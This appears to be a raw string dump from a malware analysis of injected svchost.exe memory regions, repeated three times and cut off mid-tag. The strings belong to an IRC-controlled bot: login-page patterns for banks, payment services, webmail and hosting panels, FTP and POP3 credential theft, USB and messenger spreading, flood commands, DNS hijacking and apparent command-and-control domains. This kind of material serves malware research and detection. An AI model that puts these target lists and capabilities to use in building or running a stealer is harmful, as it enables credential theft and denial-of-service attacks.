%s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%System%\services.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe</pre><pre>7 767<7~7</pre><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\services.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exe</pre><b>svchost.exe_948_rwx_009F0000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%System%\svchost.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe</pre><pre>7 767<7~7</pre><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exe</pre><b>svchost.exe_1016_rwx_00AD0000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%System%\svchost.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe</pre><pre>7 767<7~7</pre><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exe</pre><b>svchost.exe_1100_rwx_02340000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL05</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre